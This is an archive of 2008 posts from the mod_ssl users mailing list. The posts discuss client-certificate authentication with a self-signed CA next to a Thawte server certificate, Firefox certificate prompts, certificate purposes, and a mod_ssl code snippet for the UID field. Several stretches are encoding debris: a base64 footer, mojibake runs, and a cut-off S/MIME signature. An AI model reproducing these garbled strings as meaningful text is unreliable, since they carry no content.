U1NMIChtb2Rfc3NsKSAgICAgICAgICAgICAgICAgIHd3dy5tb2Rzc2wub3JnDQpVc2VyIFN1cHBv
cnQgTWFpbGluZyBMaXN0ICAgICAgICAgICAgICAgICAgICAgIG1vZHNzbC11c2Vyc0Btb2Rzc2wu
b3JnDQpBdXRvbWF0ZWQgTGlzdCBNYW5hZ2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1h
am9yZG9tb0Btb2Rzc2wub3JnDQrigJPFk+KApsOiJ8K1w6rDn2nDh8KtIMOqXu+/vSTigLnFoeKA
oWzCslwww4JqwrLDiWjCrix6wrTCrsKmxaErwrTDhsKi4oCTKcOgListxaHigKFswrJbwqx6wrsm
wqHDmyzigJPFoMOgw6to4oSiwqtedMK4wqzCtMOGwqdqwqvihKLCqMOowq3DmibComrCssOJaMKu
DQoNCg0KICAgICAgDQpfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fDQpBcGFjaGUgSW50ZXJmYWNlIHRvIE9wZW5TU0wg
KG1vZF9zc2wpICAgICAgICAgICAgICAgICAgIHd3dy5tb2Rzc2wub3JnDQpVc2VyIFN1cHBvcnQg
TWFpbGluZyBMaXN0ICAgICAgICAgICAgICAgICAgICAgIG1vZHNzbC11c2Vyc0Btb2Rzc2wub3Jn
DQpBdXRvbWF0ZWQgTGlzdCBNYW5hZ2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1ham9y
ZG9tb0Btb2Rzc2wub3JnDQo=

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 26 19:03:21 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CEC9814D9E6; Fri, 26 Sep 2008 19:03:21 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from web58303.mail.re3.yahoo.com (web58303.mail.re3.yahoo.com [68.142.236.156])
	by master.modssl.org (Postfix) with SMTP id F088914D846
	for ; Fri, 26 Sep 2008 19:03:20 +0200 (CEST)
Received: (qmail 35834 invoked by uid 60001); 26 Sep 2008 17:02:16 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=MrIsZeIABV7dqCIzejBlnMzS2d/Yw/6HwQGeuvgOcSy0pxU+ut4coXlkmF1wdaGyrOaFi9bCYk9ARcJ0j+/tZWeiSOS94ejn206feab/GaRoZqpjJ01ly6oLoD0WlLE+m28LxlZ9quN+vR999ltv+UIAKnGJIbQqscB22z83GPg=;
X-YMail-OSG: 4mD5y_cVM1kmHsO4VHZIjKO5RvcB_R9jALc2jehk0.dteRlLZAQ6nguT.QK0o6GPkgcQQRgFnwAD36._hLcWAXgBNCHfmWZbTZt2KVMp3QrvWv7oJFVPxmVr1sA84oMfpFMcQs7_JEQ2nkEFY_PXcAF5uDI-
Received: from [90.201.202.99] by web58303.mail.re3.yahoo.com via HTTP; Fri, 26 Sep 2008 10:02:15 PDT
X-Mailer: YahooMailRC/1096.28 YahooMailWebService/0.7.218.2
Date: Fri, 26 Sep 2008 10:02:15 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Can i use CA signed cert to create client authentication certificates ?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Message-ID: <141632.35421.qm@web58303.mail.re3.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,=0A=0AAsking every time does make it complicated. I can't remember if th=
e firefox default is to ask or auto supply (and it has changed behavior bet=
ween 1/2/3 AFAIK), I have it as ask every time.=0A=0AAnyway the ask every t=
ime FF behavior isn't very nice for users (auto supply is probably fine for=
 most users). FF will also ask for a cert every session ID change.=0A=0AAs =
you know there isn't an ask once option, which would be very nice.  I don't=
 think there is much that can be done to "fix" it other than coding up an "=
ask once" option in FF (which I haven't got the time to do :( ).=0A=0AAnywa=
y you may also want to use/need the "SSLOptions +OptRenegotiate" if you hav=
e portions of the site that do and don't require client certs. It can help =
greatly with IE. Sometimes IE goes a little funny and renegotiates sessions=
 all the time going from non-client cert to client cert areas.=0A=0A=0ARega=
rds=0AMatt=0A=0A=0A----- Original Message ----=0AFrom: Jan Stian Gabrielli =
=0ATo: modssl-users@modssl.org=0ASent: Thursday, Sept=
ember 25, 2008 9:37:00 AM=0ASubject: Re: Can i use CA signed cert to create=
 client authentication certificates ?=0A=0AThank you very much Matt .=0ATha=
t solved it :).=0A=0AI now have "Client Certificate Authentication" working=
 with a CA signed certificate and a Self Signed CA which in turn signs clie=
nt certs.=0A=0AIf i can only ask for a bit more advice regarding this setup=
 ?.=0AAlthough I think this problem might be Firefox specific I'm hoping fo=
r some advice here. =0A=0AInternet Explorer handles the client certificates=
 fine, prompts me to select certificate on connection to the site and basic=
ally just works after that..=0A=0ABut when Firefox is set to "Ask me every =
time" instead of "auto select client certificate" I keep getting the select=
 certificate pop up several(multiple) times per page request/load from the =
SSL secured Apache server.=0AThere is only one certificate in the select fr=
om dialog, but it keeps prompting me and I can see it loading "one" and "on=
e" item(image) on the website.=0AIf i switch to "Auto select certificate" i=
t works. But it would be nice not having the browser present the certificat=
e without it being the users choice. And honestly, choosing it once per ses=
sion per site should be sufficient=0A=0AI should probably mention that the =
page served up is behind a mod_proxy module. But this content should not di=
ffer for Firefox, and certificate selection. Or does the mod_ssl module pro=
mpt for a client certificate for each item loaded ?=0A=0AI have googled thi=
s but can't find any good answers.=0ASome say it is because of image object=
s loading. but why. =0A=0ABest regards=0A=0AJan Stian Gabrielli=0A=0AOrigin=
al Message -----------------------=0AHi,=0A=0ABasically...=0A=0ASSLCACertif=
icateFile SelfSignedCA Root Cert (public part)=0ASSLVerifyClient require or=
 optional=0ASSLVerifyDepth 1 (default)=0A=0Aand have the setup from the Thw=
ate cert as per normal for the server cert.=0A=0ARegards=0AMatt=0A=0A----- =
Original Message ----=0AFrom: Jan Stian Gabrielli =0A=
To: modssl-users@modssl.org=0ASent: Tuesday, September 23, 2008 1:39:16 PM=
=0ASubject: Re: Can i use CA signed cert to create client authentication ce=
rtificates ?=0A=0AOk. This seems like a viable solution.=0AIe.=0AI use an a=
pproved CA signed cert to verify the site auhtentisity, and i use a selfsig=
ned CA root for client certificates.=0A=0ACan you point me in a direction o=
f how i make this work in apache ?.=0AI already have a setup with a Selfsig=
ned CA working for client certificates.=0A=0ACreateed SelfSignedCA=0A|-->Cr=
eate and Sign Apache Cert from SelfSigned CA=0A|-->Create and Sign Client C=
ert from SelfSigned CA=0A=0AHow do I incorporate this with a CA (thawte) si=
gned webserver certificate ?.=0A=0ABest regards=0A=0AWizkidnono=0A=0AOrigin=
al Message -----------------------=0ASounds like your trying to use the tha=
wte apache cert to sign your client certs? The thawte cert won't have the r=
ight attributes to sign a client cert and then try to use it.=0A=0AYou coul=
d use your CA for client certs and Thawte for the server cert.=0A=0ARegards=
=0AMatt=0A=0A=0A=0A----- Original Message ----=0AFrom: Jan Stian Gabrielli =
=0ATo: modssl-users@modssl.org=0ASent: Monday, Septem=
ber 22, 2008 7:54:37 PM=0ASubject: Can i use CA signed cert to create clien=
t authentication certificates ?=0A=0AI am trying to set up apache with mod_=
ssl , and I have it working with a=0ASelf Signed CA.=0ABut i can not get it=
 to work with a cert created by thawte.com.=0A=0ADoes anyone know if it is =
possible to do this with a crt signed by a "third"=0Aparty where one does n=
ot have access to their root ca key ?..=0A=0AIe.=0A=0AI have generated a : =
apache_server.key made a apache_server..csr and sent=0Athis for signing by =
thawte.com=0ARecived a apache_server.crt=0A=0ACreated a client.key and a cl=
ient.csr=0ASigned it with my apache_server.key and apache_server.crt=0A=0AC=
onverted the client.key,crt to a pkcs12 file and imported this into my=0Abr=
owser but i can not make things work.=0A=0ASSL works fine on the server on =
pages that does not require SSL client auth.=0A=0AA I stated earlier, IT wo=
rks when I create and self sign a CA, but I cant=0Amake it work when I use =
a 3rd party CA and only have apache_server.key,=0Aapache_server.crt , thawt=
e root cert.=0A=0ABest regards=0A=0AWizkidnono=0A=C3=83=C2=A2=C3=A2=E2=80=
=9A=C2=AC=C3=A2=E2=82=AC=C5=93=C3=83=E2=80=A6=C3=A2=E2=82=AC=C5=93=C3=83=C2=
=A2=C3=A2=E2=80=9A=C2=AC=C3=82=C2=A6=C3=83=C6=92=C3=82=C2=A2'=C3=83=E2=80=
=9A=C3=82=C2=B5=C3=83=C6=92=C3=82=C2=AA=C3=83=C6=92=C3=85=C2=B8i=C3=83=C6=
=92=C3=A2=E2=82=AC=C2=A1=C3=83=E2=80=9A=C3=82=C2=AD =C3=83=C6=92=C3=82=C2=
=AA^=C3=83=C2=AF=C3=82=C2=BF=C3=82=C2=BD$=C3=83=C2=A2=C3=A2=E2=80=9A=C2=AC=
=C3=82=C2=B9=C3=83=E2=80=A6=C3=82=C2=A1=C3=83=C2=A2=C3=A2=E2=80=9A=C2=AC=C3=
=82=C2=A1l=C3=83=E2=80=9A=C3=82=C2=B2\0=C3=83=C6=92=C3=A2=E2=82=AC=C5=A1j=
=C3=83=E2=80=9A=C3=82=C2=B2=C3=83=C6=92=C3=A2=E2=82=AC=C2=B0h=C3=83=E2=80=
=9A=C3=82=C2=AE,z=C3=83=E2=80=9A=C3=82=C2=B4=C3=83=E2=80=9A=C3=82=C2=AE=C3=
=83=E2=80=9A=C3=82=C2=A6=C3=83=E2=80=A6=C3=82=C2=A1+=C3=83=E2=80=9A=C3=82=
=C2=B4=C3=83=C6=92=C3=A2=E2=82=AC =C3=83=E2=80=9A=C3=82=C2=A2=C3=83=C2=A2=
=C3=A2=E2=80=9A=C2=AC=C3=A2=E2=82=AC=C5=93)=C3=83=C6=92 .+-=C3=83=E2=80=A6=
=C3=82=C2=A1=C3=83=C2=A2=C3=A2=E2=80=9A=C2=AC=C3=82=C2=A1l=C3=83=E2=80=9A=
=C3=82=C2=B2[=C3=83=E2=80=9A=C3=82=C2=ACz=C3=83=E2=80=9A=C3=82=C2=BB&=C3=83=
=E2=80=9A=C3=82=C2=A1=C3=83=C6=92=C3=A2=E2=82=AC=C2=BA,=C3=83=C2=A2=C3=A2=
=E2=80=9A=C2=AC=C3=A2=E2=82=AC=C5=93=C3=83=E2=80=A6 =C3=83=C6=92 =C3=83=C6=
=92=C3=82=C2=ABh=C3=83=C2=A2=C3=A2=E2=82=AC=C5=BE=C3=82=C2=A2=C3=83=E2=80=
=9A=C3=82=C2=AB^t=C3=83=E2=80=9A=C3=82=C2=B8=C3=83=E2=80=9A=C3=82=C2=AC=C3=
=83=E2=80=9A=C3=82=C2=B4=C3=83=C6=92=C3=A2=E2=82=AC =C3=83=E2=80=9A=C3=82=
=C2=A7j=C3=83=E2=80=9A=C3=82=C2=AB=C3=83=C2=A2=C3=A2=E2=82=AC=C5=BE=C3=82=
=C2=A2=C3=83=E2=80=9A=C3=82=C2=A8=C3=83=C6=92=C3=82=C2=A8=C3=83=E2=80=9A=C3=
=82=C2=AD=C3=83=C6=92=C3=85=C2=A1&=C3=83=E2=80=9A=C3=82=C2=A2j=C3=83=E2=80=
=9A=C3=82=C2=B2=C3=83=C6=92=C3=A2=E2=82=AC=C2=B0h=C3=83=E2=80=9A=C3=82=C2=
=AE=0A=0A=0A      =0A______________________________________________________=
________________=0AApache Interface to OpenSSL (mod_ssl)                  w=
ww.modssl.org=0AUser Support Mailing List                      modssl-users=
@modssl.org=0AAutomated List Manager                            majordomo@m=
odssl.org=0A=C3=A2=E2=82=AC=E2=80=9C=C3=85=E2=80=9C=C3=A2=E2=82=AC=C2=A6=C3=
=83=C2=A2'=C3=82=C2=B5=C3=83=C2=AA=C3=83=C5=B8i=C3=83=E2=80=A1=C3=82=C2=AD =
=C3=83=C2=AA^=C3=AF=C2=BF=C2=BD$=C3=A2=E2=82=AC=C2=B9=C3=85=C2=A1=C3=A2=E2=
=82=AC=C2=A1l=C3=82=C2=B2\0=C3=83=E2=80=9Aj=C3=82=C2=B2=C3=83=E2=80=B0h=C3=
=82=C2=AE,z=C3=82=C2=B4=C3=82=C2=AE=C3=82=C2=A6=C3=85=C2=A1+=C3=82=C2=B4=C3=
=83=E2=80=A0=C3=82=C2=A2=C3=A2=E2=82=AC=E2=80=9C)=C3=83 .+-=C3=85=C2=A1=C3=
=A2=E2=82=AC=C2=A1l=C3=82=C2=B2[=C3=82=C2=ACz=C3=82=C2=BB&=C3=82=C2=A1=C3=
=83=E2=80=BA,=C3=A2=E2=82=AC=E2=80=9C=C3=85 =C3=83 =C3=83=C2=ABh=C3=A2=E2=
=80=9E=C2=A2=C3=82=C2=AB^t=C3=82=C2=B8=C3=82=C2=AC=C3=82=C2=B4=C3=83=E2=80=
=A0=C3=82=C2=A7j=C3=82=C2=AB=C3=A2=E2=80=9E=C2=A2=C3=82=C2=A8=C3=83=C2=A8=
=C3=82=C2=AD=C3=83=C5=A1&=C3=82=C2=A2j=C3=82=C2=B2=C3=83=E2=80=B0h=C3=82=C2=
=AE=0A=0A=0A      =0A______________________________________________________=
________________=0AApache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org=0AUser Support Mailing List                      modssl-user=
s@modssl.org=0AAutomated List Manager                            majordomo@=
modssl.org=0A=E2=80=93=C5=93=E2=80=A6=C3=A2'=C2=B5=C3=AA=C3=9Fi=C3=87=C2=AD=
 =C3=AA^=EF=BF=BD$=E2=80=B9=C5=A1=E2=80=A1l=C2=B2\0=C3=82j=C2=B2=C3=89h=C2=
=AE,z=C2=B4=C2=AE=C2=A6=C5=A1+=C2=B4=C3=86=C2=A2=E2=80=93)=C3=A0.+-=C5=A1=
=E2=80=A1l=C2=B2[=C2=ACz=C2=BB&=C2=A1=C3=9B,=E2=80=93=C5=A0=C3=A0=C3=ABh=E2=
=84=A2=C2=AB^t=C2=B8=C2=AC=C2=B4=C3=86=C2=A7j=C2=AB=E2=84=A2=C2=A8=C3=A8=C2=
=AD=C3=9A&=C2=A2j=C2=B2=C3=89h=C2=AE=0A=0A=0A      
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  6 20:33:53 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5A61314DA3D; Mon,  6 Oct 2008 20:33:53 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.fo (pop.olivant.fo [212.55.32.152])
	by master.modssl.org (Postfix) with ESMTP id A692014D838
	for ; Mon,  6 Oct 2008 20:33:52 +0200 (CEST)
Received: from macmini.local (unverified [212.55.39.246]) 
	by mail.fo (SurgeMail 3.9c) with ESMTP id 11574533-1868269 
	for ; Mon, 06 Oct 2008 19:32:46 +0100
Message-ID: <48EA59CD.2040704@gunnar-pv.fo>
Date: Mon, 06 Oct 2008 19:32:45 +0100
From: "Gunnar P. Vestergaard" 
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Embedded purposes
References: <141632.35421.qm@web58303.mail.re3.yahoo.com>
In-Reply-To: <141632.35421.qm@web58303.mail.re3.yahoo.com>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
X-Originating-IP: 212.55.39.246
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gunnar P. Vestergaard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

If a user is trying to authenticate himself with an SSL web server, he 
needs to present a valid personal certificate, I understand. But what if 
the purpose of the client certificate is not valid? I mean, for one 
user's certificate, Mozilla SeaMonkey reports: "This certificate has 
been verified for the following uses: Email Signer Certificate and Email 
Recipient Certificate". Will an SSL web server accept such a client 
certificate for authenticating an SSL web connection?

Gunnar Vestergaard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 10 16:57:14 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A1CC914DA64; Fri, 10 Oct 2008 16:57:14 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from ganymede.on-x.com (ganymede.on-x.com [194.51.68.3])
	by master.modssl.org (Postfix) with ESMTP id 5F5E914DA60
	for ; Fri, 10 Oct 2008 16:57:14 +0200 (CEST)
Received: from vinea.on-x.com (sedna.puteaux.on-x [192.168.10.9])
	by ganymede.on-x.com (Postfix) with ESMTP id E890069
	for ; Fri, 10 Oct 2008 16:56:08 +0200 (CEST)
Received: from [193.51.14.5] ([212.234.46.65])
          by vinea.on-x.com (Lotus Domino Release 5.0.11)
          with ESMTP id 2008101016560834:165826 ;
          Fri, 10 Oct 2008 16:56:08 +0200 
Message-ID: <48EF6B92.3010508@edelweb.fr>
Date: Fri, 10 Oct 2008 16:49:54 +0200
From: Peter Sylvester 
User-Agent: Thunderbird 1.5.0.9 (X11/20061206)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: X509 variables  ..UID
X-MIMETrack: Itemize by SMTP Server on vinea/ON-X(Release 5.0.11  |July 24, 2002) at 10/10/2008
 04:56:08 PM,
	Serialize by Router on vinea/ON-X(Release 5.0.11  |July 24, 2002) at 10/10/2008
 04:56:08 PM,
	Serialize complete at 10/10/2008 04:56:08 PM
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms080105090707050509030302"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Sylvester 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms080105090707050509030302
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable

in ssl_engine_vars, there seems to be a problem to me concerning the UID =

field.
The syntax for the field is a bitstring and not a "text".



static const struct {
    char *name;
    int   nid;
} ssl_var_lookup_ssl_cert_dn_rec[] =3D {
    { "C",     NID_countryName            },
    { "ST",    NID_stateOrProvinceName    }, /* officially    (RFC2156) *=
/
    { "SP",    NID_stateOrProvinceName    }, /* compatibility (SSLeay)  *=
/
    { "L",     NID_localityName           },
    { "O",     NID_organizationName       },
    { "OU",    NID_organizationalUnitName },
    { "CN",    NID_commonName             },
    { "T",     NID_title                  },
    { "I",     NID_initials               },
    { "G",     NID_givenName              },
    { "S",     NID_surname                },
    { "D",     NID_description            },
#if SSL_LIBRARY_VERSION >=3D 0x00907000
    { "UID",   NID_x500UniqueIdentifier   },
#else
    { "UID",   NID_uniqueIdentifier       },
#endif
    { "Email", NID_pkcs9_emailAddress     },
    { NULL,    0                          }
};


--=20


*Edel/W/eb* 	Peter SYLVESTER
Consultant S=E9curit=E9 des Syst=E8mes d'Information
-----------------------------------------------------------
EdelWeb - Groupe ON-X
15, quai de Dion-Bouton
F-92816 Puteaux Cedex
Tel : +33.1.40.99.14.14 / Fax : +33.1.40.99.99.58
www.edelweb.fr  / www.on-x.com 
-----------------------------------------------------------
To verify the message signature, see edelpki.edelweb.fr=20

Cela vous permet de charger le certificat de l'autorit=E9 de racine=20
;
die Liste mit zur=FCckgerufenen Zertifikaten finden Sie da auch.



--------------ms080105090707050509030302
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

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
